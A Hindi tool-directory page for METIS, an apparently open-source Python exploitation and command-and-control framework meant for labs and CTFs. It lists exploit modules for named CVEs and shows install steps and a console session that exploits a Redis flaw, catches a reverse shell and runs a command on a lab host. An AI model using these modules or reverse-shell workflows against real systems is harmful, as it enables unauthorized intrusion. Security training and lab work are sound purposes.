Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
METIS — Metasploit-शैली कंसोल, स्वतः-पंजीकरण करने वाले Exploit और Auxiliary मॉड्यूल, tri-state जाँच, और लैब तथा CTF लक्ष्यों के लिए कई session ट्रांसपोर्ट वाला मॉड्यूलर Python exploitation फ्रेमवर्क। | Kitploit
उपकरण/GitHubGitHub/k3ystr0k3r/metis
भेद्यता परीक्षण फ्रेमवर्कभेद्यता स्कैनरशोषण फ्रेमवर्कशोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
3618घं 22मि पहलेअभी तक समीक्षित नहीं
GitHubk3ystr0k3r/metis

METIS

Metasploit-शैली कंसोल, स्वतः-पंजीकरण करने वाले Exploit और Auxiliary मॉड्यूल, tri-state जाँच, और लैब तथा CTF लक्ष्यों के लिए कई session ट्रांसपोर्ट वाला मॉड्यूलर Python exploitation फ्रेमवर्क।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

METIS - मॉड्यूलर एक्सप्लॉइटेशन और थ्रेट इंटेलिजेंस फ्रेमवर्क

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

सीखने के लिए बनाया गया एक Python एक्सप्लॉइटेशन फ्रेमवर्क। मॉड्यूलर आर्किटेक्चर, थीम्ड कंसोल, कई सत्र ट्रांसपोर्ट, और CVE मॉड्यूल की बढ़ती लाइब्रेरी।


समुदाय संचालित

METIS एक समुदाय-संचालित सुरक्षा अनुसंधान फ्रेमवर्क है। लक्ष्य सुरक्षा शोधकर्ताओं, डेवलपर्स और व्यापक समुदाय द्वारा योगदान किए गए मॉड्यूल का बढ़ता संग्रह बनाना है।

क्या आपके पास कोई उपयोगी स्कैनर, सहायक मॉड्यूल, एक्सप्लॉइट मॉड्यूल, या अन्य सुरक्षा अनुसंधान टूलिंग है जिसे आप साझा करना चाहेंगे? इसे METIS में जोड़ें और एक Pull Request खोलें।

सभी योगदान स्वागत योग्य हैं, बशर्ते वे प्रोजेक्ट की मॉड्यूल संरचना, कोडिंग मानकों और अधिकृत-उपयोग दिशानिर्देशों का पालन करें।

चाहे आप एक नया CVE मॉड्यूल जोड़ रहे हों, किसी मौजूदा मॉड्यूल को बेहतर बना रहे हों, कोई बग ठीक कर रहे हों, या नई फ्रेमवर्क कार्यक्षमता बना रहे हों, आपके योगदान METIS को सभी के लिए बेहतर बनाने में मदद कर सकते हैं।

अपना स्वयं का मॉड्यूल बनाने की जानकारी के लिए नीचे मॉड्यूल लिखना देखें।


यह क्या है

METIS एक मॉड्यूलर C2/एक्सप्लॉइटेशन फ्रेमवर्क है जो Python में लिखा गया है। यह एक Metasploit-शैली का इंटरैक्टिव कंसोल चलाता है जहाँ आप मॉड्यूल चुनते हैं, विकल्प सेट करते हैं, जाँच चलाते हैं, और लैब लक्ष्यों के विरुद्ध सत्र प्राप्त करते हैं।

यह इनके लिए डिज़ाइन किया गया है:

  • सीखना कि एक्सप्लॉइटेशन फ्रेमवर्क अंदर से कैसे काम करते हैं
  • लैब कार्य कमजोर VMs और कंटेनरों के विरुद्ध
  • CTF अभ्यास जहाँ एक स्क्रिप्टेबल फ्रेमवर्क मैनुअल टूलिंग से तेज़ है
  • समुदाय योगदान कस्टम मॉड्यूल और फ्रेमवर्क सुधारों के माध्यम से

यह इनके लिए नहीं डिज़ाइन किया गया है:

  • उन सिस्टमों पर हमला करना जो आपके स्वामित्व में नहीं हैं या जिनका परीक्षण करने की लिखित अनुमति आपके पास नहीं है
  • प्रोडक्शन रेड-टीम एंगेजमेंट (Cobalt Strike, Sliver, या Mythic का उपयोग करें)
  • सार्वजनिक इंटरनेट पर कुछ भी

विशेषताएँ

  • मॉड्यूलर आर्किटेक्चर — modules/ में एक .py फ़ाइल डालें और यह स्वतः पंजीकृत हो जाती है
  • दो मॉड्यूल प्रकार — Exploit (सत्र उत्पन्न करता है) और Auxiliary (स्कैनर, एन्यूमरेटर)
  • त्रि-अवस्था check() — प्रत्येक मॉड्यूल हमला करने से पहले सत्यापित कर सकता है (VULNERABLE / SAFE / UNKNOWN)
  • कई सत्र ट्रांसपोर्ट — रिवर्स सॉकेट, बाइंड सॉकेट, paramiko चैनल, HTTP वेबशेल, रॉ टेलनेट
  • थ्रेडेड स्कैनिंग — CIDR/कॉमा-सूची/रेंज/file: लक्ष्य स्पेक्स लाइव प्रगति बार के साथ
  • थीम्ड कंसोल — 22 अंतर्निहित रंग योजनाएँ प्रति-थीम प्रगति बार ग्रेडिएंट के साथ
  • RC फ़ाइल ऑटोमेशन — संपूर्ण वर्कफ़्लो स्क्रिप्ट करें
  • प्रति-मॉड्यूल SOURCE फ़ाइलें — KEY=VALUE फ़ाइलों से विकल्प लोड करें
  • लोकल शेल एस्केप — फ्रेमवर्क छोड़े बिना कोई भी शेल कमांड चलाएँ
  • लीन कोर — जानबूझकर न्यूनतम निर्भरताएँ और एब्स्ट्रैक्शन

मॉड्यूल

Auxiliary — स्कैनर और एन्यूमरेटर

मॉड्यूलविवरण
auxiliary/scanner/tcp_connectथ्रेडेड TCP पोर्ट स्कैनर
auxiliary/scanner/hikvision_cve_2017_7921Hikvision IP कैमरा ऑथ बायपास + उपयोगकर्ता एन्यूमरेशन
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847MikroTik WinBox क्रेडेंशियल लीक
auxiliary/scanner/redis_cve_2022_0543Redis Lua सैंडबॉक्स एस्केप डिटेक्टर

Exploits — सत्र-उत्पादक

मॉड्यूलसत्र प्रकार
exploit/unix/ftp/vsftpd_234_backdoorबाइंड सॉकेट
exploit/multi/http/ghost_cms_handlebars_rceरिवर्स सॉकेट
exploit/multi/http/langflow_rce_cve_2026_9198रिवर्स सॉकेट
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816रिवर्स सॉकेट
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197रिवर्स सॉकेट
exploit/multi/http/tomcat_put_rce_cve_2017_12615रिवर्स सॉकेट
exploit/multi/http/joomla_jce_rce_cve_2026_48907HTTP वेबशेल
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819विलंबित रिवर्स (cron)
exploit/linux/redis/redis_cve_2022_0543_rceरिवर्स सॉकेट
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Paramiko चैनल
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061रॉ टेलनेट सॉकेट

इंस्टॉल

Python 3.10+ और git आवश्यक है।

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

चलाएँ:

python3 metis.py

उपयोग

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)

metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >

सामान्य कमांड

टूल डाउनलोड करें